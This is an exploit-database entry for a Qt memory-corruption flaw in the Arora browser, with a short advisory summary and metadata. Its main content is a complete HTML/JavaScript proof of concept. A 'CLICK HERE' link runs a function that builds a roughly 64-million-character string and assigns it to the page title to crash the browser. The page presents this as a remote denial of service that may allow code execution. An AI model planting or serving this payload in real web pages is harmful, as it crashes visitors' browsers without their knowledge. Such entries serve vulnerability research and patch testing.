header-logo
Suggest Exploit
vendor:
Arora browser
by:
Unknown
7.5
CVSS
HIGH
Remote Denial of Service
Unknown
CWE
Product Name: Arora browser
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Arora browser Remote Denial fo Service

This exploit targets the Arora browser and utilizes a remote memory-corruption vulnerability in Qt. By clicking on a link, the attacker can trigger the exploit, leading to the execution of arbitrary code within the application's context. In cases where the exploit fails, a denial-of-service condition will be triggered.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41873/info

Qt is prone to a remote memory-corruption vulnerability.

Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. 

<html>
<head>
<title>Arora browser Remote Denial fo Service </title>
<body bgcolor="black">

<script type="text/javascript">
function garbage() {
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2>==> <a href="javascript:garbage();">CLICK HERE</a></font> <==</h2>
</body>
</html>